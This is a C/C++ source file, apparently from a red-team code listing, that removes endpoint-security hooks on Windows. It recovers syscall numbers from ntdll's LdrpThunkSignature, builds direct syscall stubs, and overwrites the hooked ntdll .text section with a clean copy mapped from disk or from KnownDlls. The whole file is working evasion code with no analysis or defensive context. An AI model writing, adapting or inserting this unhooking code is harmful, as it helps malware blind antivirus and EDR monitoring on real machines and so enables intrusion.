1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621
| #include <windows.h> #include <psapi.h>
#include <stdio.h>
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) #define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )
#define MAX_SYSCALL_STUB_SIZE 64
#define OBJ_CASE_INSENSITIVE 0x40
#define InitializeObjectAttributes( p, n, a, r, s ) { \ (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ (p)->RootDirectory = r; \ (p)->Attributes = a; \ (p)->ObjectName = n; \ (p)->SecurityDescriptor = s; \ (p)->SecurityQualityOfService = NULL; \ }
typedef void* PRTL_USER_PROCESS_PARAMETERS;
typedef void* PPS_POST_PROCESS_INIT_ROUTINE;
typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, * RX_UNICODE_STRING;
typedef struct _PEB_LDR_DATA { DWORD dwLength; DWORD dwInitialized; LPVOID lpSsHandle; LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; LPVOID lpEntryInProgress; } PEB_LDR_DATA, * RX_PEB_LDR_DATA;
typedef struct _PEB { BYTE Reserved1[2]; BYTE BeingDebugged; BYTE Reserved2[1]; PVOID Reserved3[2]; RX_PEB_LDR_DATA Ldr; PRTL_USER_PROCESS_PARAMETERS ProcessParameters; PVOID Reserved4[3]; PVOID AtlThunkSListPtr; PVOID Reserved5; ULONG Reserved6; PVOID Reserved7; ULONG Reserved8; ULONG AtlThunkSListPtr32; PVOID Reserved9[45]; BYTE Reserved10[96]; PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine; BYTE Reserved11[128]; PVOID Reserved12[1]; ULONG SessionId; } PEB, * RX_PEB;
typedef struct { LIST_ENTRY InLoadOrderLinks; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; PVOID DllBase; PVOID EntryPoint; ULONG SizeOfImage; UNICODE_STRING FullDllName; UNICODE_STRING BaseDllName; ULONG Flags; SHORT LoadCount; SHORT TlsIndex; LIST_ENTRY HashTableEntry; ULONG TimeDateStamp; } LDR_DATA_TABLE_ENTRY, * RX_LDR_DATA_TABLE_ENTRY;
typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; RX_UNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * RX_OBJECT_ATTRIBUTES;
typedef struct _IO_STATUS_BLOCK { union { NTSTATUS Status; PVOID Pointer; }; ULONG_PTR Information; } IO_STATUS_BLOCK, * RX_IO_STATUS_BLOCK;
typedef NTSYSAPI NTSTATUS(NTAPI* RX_NtOpenFile)(PHANDLE, ACCESS_MASK, RX_OBJECT_ATTRIBUTES, RX_IO_STATUS_BLOCK, ULONG, ULONG);
typedef NTSTATUS(NTAPI* RX_NtCreateSection)(PHANDLE, ACCESS_MASK, RX_OBJECT_ATTRIBUTES, PLARGE_INTEGER, ULONG, ULONG, HANDLE);
typedef NTSTATUS(NTAPI* RX_NtOpenSection)(HANDLE*, ACCESS_MASK, OBJECT_ATTRIBUTES*);
typedef NTSTATUS(NTAPI* RX_NtMapViewOfSection)(HANDLE, HANDLE, PVOID*, ULONG_PTR, SIZE_T, PLARGE_INTEGER, PSIZE_T, DWORD, ULONG, ULONG);
typedef NTSTATUS(NTAPI* _NtProtectVirtualMemory)(HANDLE, PVOID, PSIZE_T, ULONG, PULONG);
typedef NTSTATUS(NTAPI* _NtUnmapViewOfSection)(HANDLE, PVOID);
typedef VOID(NTAPI* _RtlInitUnicodeString)(RX_UNICODE_STRING, PCWSTR);
RX_NtOpenFile RxNtOpenFile = NULL; RX_NtCreateSection RxNtCreateSection = NULL;
RX_NtOpenSection RxNtOpenSection = NULL;
RX_NtMapViewOfSection RxNtMapViewOfSection = NULL;
ULONG_PTR BuildSyscallStub(ULONG_PTR pStubRegion, DWORD dwSyscallNo) { BYTE bSyscallStub[] = { 0x4c, 0x8b, 0xd1, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc3 };
memcpy((PBYTE)pStubRegion, bSyscallStub, sizeof(bSyscallStub)); *(DWORD*)(pStubRegion + 4) = dwSyscallNo;
return pStubRegion; }
BOOL InitSyscallsFromLdrpThunkSignature() { printf("[*] Parsing(解析) LdrpThunkSignature For Clean Syscalls.\n\n");
RX_PEB pPEB = (RX_PEB)__readgsqword(0x60); RX_PEB_LDR_DATA pPEBLdr = pPEB->Ldr; RX_LDR_DATA_TABLE_ENTRY pLdeNTDLL = NULL;
for (RX_LDR_DATA_TABLE_ENTRY pLdeTmp = (RX_LDR_DATA_TABLE_ENTRY)pPEBLdr->InLoadOrderModuleList.Flink; pLdeTmp->DllBase != NULL; pLdeTmp = (RX_LDR_DATA_TABLE_ENTRY)pLdeTmp->InLoadOrderLinks.Flink) { if (_wcsnicmp(pLdeTmp->BaseDllName.Buffer, L"ntdll.dll", 9) == 0) { pLdeNTDLL = pLdeTmp; break; } }
if (pLdeNTDLL == NULL) { printf("[!] Cannot find NTDLL.\n"); return FALSE; }
PIMAGE_NT_HEADERS ImageNtHeaders = (PIMAGE_NT_HEADERS)((ULONG_PTR)pLdeNTDLL->DllBase + ((PIMAGE_DOS_HEADER)pLdeNTDLL->DllBase)->e_lfanew); PIMAGE_SECTION_HEADER SectionHeader = (PIMAGE_SECTION_HEADER)((ULONG_PTR)&ImageNtHeaders->OptionalHeader + ImageNtHeaders->FileHeader.SizeOfOptionalHeader);
ULONG_PTR DataSectionAddress = NULL; DWORD DataSectionSize;
for (WORD i = 0; i < ImageNtHeaders->FileHeader.NumberOfSections; i++) { if (!strcmp((char*)SectionHeader[i].Name, ".data")) { DataSectionAddress = (ULONG_PTR)pLdeNTDLL->DllBase + SectionHeader[i].VirtualAddress; DataSectionSize = SectionHeader[i].Misc.VirtualSize; break; } }
if (!DataSectionAddress || DataSectionSize < 16 * 5) { return FALSE; }
DWORD dwNtOpenFile = 0;
DWORD dwNtCreateSection = 0;
DWORD dwNtOpenSection = 0;
DWORD dwNtMapViewOfSection = 0;
for (UINT uiOffset = 0; uiOffset < DataSectionSize - (16 * 5); uiOffset++) { if (*(DWORD*)(DataSectionAddress + uiOffset) == 0xb8d18b4c && *(DWORD*)(DataSectionAddress + uiOffset + 16) == 0xb8d18b4c && *(DWORD*)(DataSectionAddress + uiOffset + 32) == 0xb8d18b4c && *(DWORD*)(DataSectionAddress + uiOffset + 48) == 0xb8d18b4c && *(DWORD*)(DataSectionAddress + uiOffset + 64) == 0xb8d18b4c) {
dwNtOpenFile = *(DWORD*)(DataSectionAddress + uiOffset + 4);
dwNtCreateSection = *(DWORD*)(DataSectionAddress + uiOffset + 16 + 4);
dwNtOpenSection = *(DWORD*)(DataSectionAddress + uiOffset + 48 + 4);
dwNtMapViewOfSection = *(DWORD*)(DataSectionAddress + uiOffset + 64 + 4);
break; } }
if (!dwNtMapViewOfSection) {
return FALSE;
}
printf("[*] NtOpenFile syscall number..............: %02x\n", dwNtOpenFile);
printf("[*] NtCreateSection syscall number.........: %02x\n", dwNtCreateSection);
printf("[*] NtOpenSection syscall number...........: %02x\n", dwNtOpenSection);
printf("[*] NtMapViewOfSection syscall number......: %02x\n\n", dwNtMapViewOfSection);
ULONG_PTR pSyscallRegion = (ULONG_PTR)VirtualAlloc(NULL, 4 * MAX_SYSCALL_STUB_SIZE, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
if (!pSyscallRegion) {
printf("[!] Cannot allocate memory for syscals stubs.\n");
return FALSE;
}
RxNtOpenFile = (RX_NtOpenFile)BuildSyscallStub(pSyscallRegion, dwNtOpenFile);
RxNtCreateSection = (RX_NtCreateSection)BuildSyscallStub(pSyscallRegion + MAX_SYSCALL_STUB_SIZE, dwNtCreateSection);
RxNtOpenSection = (RX_NtOpenSection)BuildSyscallStub(pSyscallRegion + (2 * MAX_SYSCALL_STUB_SIZE), dwNtOpenSection);
RxNtMapViewOfSection = (RX_NtMapViewOfSection)BuildSyscallStub(pSyscallRegion + (3 * MAX_SYSCALL_STUB_SIZE), dwNtMapViewOfSection);
DWORD dwOldProtection; BOOL bStatus = VirtualProtect((LPVOID)pSyscallRegion, 4 * MAX_SYSCALL_STUB_SIZE, PAGE_EXECUTE_READ, &dwOldProtection);
return TRUE; }
uintptr_t CustomGetProcAddress(void* hModule, const char* wAPIName) {
unsigned char* lpBase = (unsigned char*)(hModule);
PIMAGE_DOS_HEADER idhDosHeader = (PIMAGE_DOS_HEADER)(lpBase);
if (idhDosHeader->e_magic == 0x5A4D) {
PIMAGE_NT_HEADERS inhNtHeader = (PIMAGE_NT_HEADERS)(lpBase + idhDosHeader->e_lfanew);
if (inhNtHeader->Signature == 0x4550) {
PIMAGE_EXPORT_DIRECTORY iedExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(lpBase + inhNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
for (register unsigned int uiIter = 0; uiIter < iedExportDirectory->NumberOfNames; ++uiIter) {
char* szNames = reinterpret_cast<char*>(lpBase + reinterpret_cast<unsigned long*>(lpBase + iedExportDirectory->AddressOfNames)[uiIter]);
if (strcmp(szNames, wAPIName) == 0) {
unsigned short usOrdinal = reinterpret_cast<unsigned short*>(lpBase + iedExportDirectory->AddressOfNameOrdinals)[uiIter];
return (uintptr_t)(lpBase + reinterpret_cast<unsigned long*>(lpBase + iedExportDirectory->AddressOfFunctions)[usOrdinal]);
}
}
}
}
return NULL; }
BOOL Technique1() {
printf("[*] Using Technique-1, Reads NTDLL From Disk and Clean.\n\n");
NTSTATUS ntStatus;
HMODULE hHookedNtdll = GetModuleHandleA("ntdll.dll");
if (hHookedNtdll == NULL) { printf("[-] GetModuleHandleA error: %d\n", GetLastError()); return FALSE; }
OBJECT_ATTRIBUTES ObjectAttributes = { 0 }; UNICODE_STRING ObjectPath = { 0 }; IO_STATUS_BLOCK IoStatusBlock = { 0 }; _RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(hHookedNtdll, "RtlInitUnicodeString"); if (RtlInitUnicodeString == NULL) { return FALSE; } RtlInitUnicodeString(&ObjectPath, L"\\??\\C:\\Windows\\System32\\ntdll.dll");
InitializeObjectAttributes(&ObjectAttributes, &ObjectPath, OBJ_CASE_INSENSITIVE, NULL, NULL);
HANDLE hFile = NULL;
ntStatus = RxNtOpenFile(&hFile, FILE_READ_DATA | GENERIC_READ, &ObjectAttributes, &IoStatusBlock, FILE_SHARE_READ, NULL);
if (!NT_SUCCESS(ntStatus)) { printf("[-] NtOpenFile error.\n"); CloseHandle(hFile); return FALSE; }
printf("[*] Clean NTDLL Handle Address.............: 0x%p\n", hFile);
HANDLE hSection = NULL;
ntStatus = RxNtCreateSection(&hSection, STANDARD_RIGHTS_REQUIRED | SECTION_MAP_READ | SECTION_QUERY, NULL, NULL, PAGE_READONLY, SEC_IMAGE, hFile);
if (!NT_SUCCESS(ntStatus)) { printf("[-] NtCreateSection error.\n"); CloseHandle(hSection); return FALSE; }
printf("[*] Clean Section Handle Address...........: 0x%p\n\n", hSection);
LPVOID pCleanNtdll = NULL; SIZE_T sztViewSize = 0;
ntStatus = RxNtMapViewOfSection(hSection, NtCurrentProcess(), &pCleanNtdll, NULL, NULL, NULL, &sztViewSize, 1, 0, PAGE_READONLY);
if (!NT_SUCCESS(ntStatus)) { printf("[-] NtMapViewOfSection error.\n"); CloseHandle(hSection); return FALSE; }
printf("[*] Clean NTDLL Base Address...............: 0x%p\n", pCleanNtdll);
MODULEINFO miHookedNtdll = {};
if (GetModuleInformation(NtCurrentProcess(), hHookedNtdll, &miHookedNtdll, sizeof(miHookedNtdll)) == 0) { printf("[-] GetModuleInformation error: %d\n", GetLastError()); return FALSE; }
LPVOID pHookedBaseAddress = (LPVOID)miHookedNtdll.lpBaseOfDll; printf("[*] Hooked NTDLL Base Address..............: 0x%p\n\n", pHookedBaseAddress);
PIMAGE_DOS_HEADER pHookedDosHeader = (PIMAGE_DOS_HEADER)pHookedBaseAddress;
PIMAGE_NT_HEADERS pHookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)pHookedBaseAddress + pHookedDosHeader->e_lfanew);
for (SIZE_T i = 0; i < pHookedNtHeader->FileHeader.NumberOfSections; i++) {
PIMAGE_SECTION_HEADER pHookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(pHookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));
LPSTR szHookedSectionName = (LPSTR)pHookedSectionHeader->Name;
if (!strcmp(szHookedSectionName, ".text")) { LPVOID pHookedTextSectionAddress = (LPVOID)((DWORD_PTR)pHookedBaseAddress + (DWORD_PTR)pHookedSectionHeader->VirtualAddress);
LPVOID pCleanTextStartAddress = (LPVOID)((DWORD_PTR)pCleanNtdll + (DWORD_PTR)pHookedSectionHeader->VirtualAddress);
SIZE_T sztTextSectionSize = pHookedSectionHeader->Misc.VirtualSize;
printf("[*] Hooked NTDLL .TEXT Section VA..........: 0x%p\n", pHookedTextSectionAddress); printf("[*] Clean NTDLL .TEXT Section VA...........: 0x%p\n\n", pCleanTextStartAddress); printf("[*] Size of .TEXT Section..................: %zd\n", sztTextSectionSize);
LPVOID lpBaseAddress = pHookedTextSectionAddress; SIZE_T uSize = sztTextSectionSize;
_NtProtectVirtualMemory NtProtectVirtualMemory = (_NtProtectVirtualMemory)CustomGetProcAddress(pCleanNtdll, "NtProtectVirtualMemory");
ULONG oldProtection; ntStatus = NtProtectVirtualMemory(NtCurrentProcess(), &lpBaseAddress, &uSize, PAGE_EXECUTE_READWRITE, &oldProtection);
if (!NT_SUCCESS(ntStatus)) { printf("[-] NtProtectVirtualMemory - 1: Error.\n"); return FALSE; }
memcpy(pHookedTextSectionAddress, pCleanTextStartAddress, sztTextSectionSize);
ntStatus = NtProtectVirtualMemory(NtCurrentProcess(), &lpBaseAddress, &uSize, oldProtection, &oldProtection); if (!NT_SUCCESS(ntStatus)) { printf("[-] NtProtectVirtualMemory - 2: Error.\n"); return FALSE; }
printf("\n[+] NTDLL is cleaned. Closing handles...\n\n");
break;
}
}
_NtUnmapViewOfSection NtUnmapViewOfSection = (_NtUnmapViewOfSection)GetProcAddress(hHookedNtdll, "NtUnmapViewOfSection"); ntStatus = NtUnmapViewOfSection(NtCurrentProcess(), pCleanNtdll); if (!NT_SUCCESS(ntStatus)) { printf("[-] NtUnmapViewOfSection error: %X\n", ntStatus); return FALSE; }
CloseHandle(hSection);
CloseHandle(hFile);
printf("[+] All done.\n");
return TRUE;
}
BOOL Technique2() {
printf("[*] Using Technique-2, Reads NTDLL From KnownDlls and Clean.\n\n");
NTSTATUS ntStatus;
HMODULE hHookedNtdll = GetModuleHandleA("ntdll.dll");
if (hHookedNtdll == NULL) { printf("[-] GetModuleHandleA error: %d\n", GetLastError()); return FALSE; }
OBJECT_ATTRIBUTES ObjectAttributes = { 0 }; UNICODE_STRING ObjectPath = { 0 }; IO_STATUS_BLOCK IoStatusBlock = { 0 }; _RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(hHookedNtdll, "RtlInitUnicodeString"); if (RtlInitUnicodeString == NULL) { return FALSE; } RtlInitUnicodeString(&ObjectPath, L"\\KnownDlls\\ntdll.dll");
InitializeObjectAttributes(&ObjectAttributes, &ObjectPath, OBJ_CASE_INSENSITIVE, NULL, NULL);
HANDLE hKnownDll = NULL;
ntStatus = RxNtOpenSection(&hKnownDll, SECTION_MAP_READ | SECTION_MAP_EXECUTE, &ObjectAttributes);
if (!NT_SUCCESS(ntStatus)) { printf("[-] NtOpenSection error.\n"); CloseHandle(hKnownDll); return FALSE; }
printf("[*] Clean Section Handle Address...........: 0x%p\n\n", hKnownDll);
LPVOID pCleanNtdll = NULL; SIZE_T sztViewSize = 0;
ntStatus = RxNtMapViewOfSection(hKnownDll, NtCurrentProcess(), &pCleanNtdll, NULL, NULL, NULL, &sztViewSize, 1, 0, PAGE_READONLY); if (!NT_SUCCESS(ntStatus)) { printf("[-] NtMapViewOfSection error.\n"); CloseHandle(hKnownDll); return FALSE; }
printf("[*] Clean NTDLL Base Address...............: 0x%p\n", pCleanNtdll);
MODULEINFO miHookedNtdll = {};
if (GetModuleInformation(NtCurrentProcess(), hHookedNtdll, &miHookedNtdll, sizeof(miHookedNtdll)) == 0) { printf("[-] GetModuleInformation error: %d\n", GetLastError()); return FALSE; }
LPVOID pHookedBaseAddress = (LPVOID)miHookedNtdll.lpBaseOfDll; printf("[*] Hooked NTDLL Base Address..............: 0x%p\n\n", pHookedBaseAddress);
PIMAGE_DOS_HEADER pHookedDosHeader = (PIMAGE_DOS_HEADER)pHookedBaseAddress;
PIMAGE_NT_HEADERS pHookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)pHookedBaseAddress + pHookedDosHeader->e_lfanew);
for (SIZE_T i = 0; i < pHookedNtHeader->FileHeader.NumberOfSections; i++) {
PIMAGE_SECTION_HEADER pHookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(pHookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));
LPSTR szHookedSectionName = (LPSTR)pHookedSectionHeader->Name;
if (!strcmp(szHookedSectionName, ".text")) {
LPVOID pHookedTextSectionAddress = (LPVOID)((DWORD_PTR)pHookedBaseAddress + (DWORD_PTR)pHookedSectionHeader->VirtualAddress);
LPVOID pCleanTextStartAddress = (LPVOID)((DWORD_PTR)pCleanNtdll + (DWORD_PTR)pHookedSectionHeader->VirtualAddress);
SIZE_T sztTextSectionSize = pHookedSectionHeader->Misc.VirtualSize;
printf("[*] Hooked NTDLL .TEXT Section VA..........: 0x%p\n", pHookedTextSectionAddress); printf("[*] Clean NTDLL .TEXT Section VA...........: 0x%p\n\n", pCleanTextStartAddress); printf("[*] Size of .TEXT Section..................: %zd\n", sztTextSectionSize);
LPVOID lpBaseAddress = pHookedTextSectionAddress; SIZE_T uSize = sztTextSectionSize;
_NtProtectVirtualMemory NtProtectVirtualMemory = (_NtProtectVirtualMemory)CustomGetProcAddress(pCleanNtdll, "NtProtectVirtualMemory");
ULONG oldProtection; ntStatus = NtProtectVirtualMemory(NtCurrentProcess(), &lpBaseAddress, &uSize, PAGE_EXECUTE_READWRITE, &oldProtection);
if (!NT_SUCCESS(ntStatus)) { printf("[-] NtProtectVirtualMemory - 1: Error.\n"); return FALSE; }
memcpy(pHookedTextSectionAddress, pCleanTextStartAddress, sztTextSectionSize);
ntStatus = NtProtectVirtualMemory(NtCurrentProcess(), &lpBaseAddress, &uSize, oldProtection, &oldProtection); if (!NT_SUCCESS(ntStatus)) { printf("[-] NtProtectVirtualMemory - 2: Error.\n"); return FALSE; }
printf("\n[+] NTDLL is cleaned. Closing handles...\n\n");
break;
}
}
_NtUnmapViewOfSection NtUnmapViewOfSection = (_NtUnmapViewOfSection)GetProcAddress(hHookedNtdll, "NtUnmapViewOfSection"); ntStatus = NtUnmapViewOfSection(NtCurrentProcess(), pCleanNtdll); if (!NT_SUCCESS(ntStatus)) { printf("[-] NtUnmapViewOfSection error: %X\n", ntStatus); return FALSE; }
CloseHandle(hKnownDll);
printf("[+] All done.\n");
return TRUE;
}
int main() {
if (InitSyscallsFromLdrpThunkSignature() == TRUE) {
Technique2(); }
return 0; }
|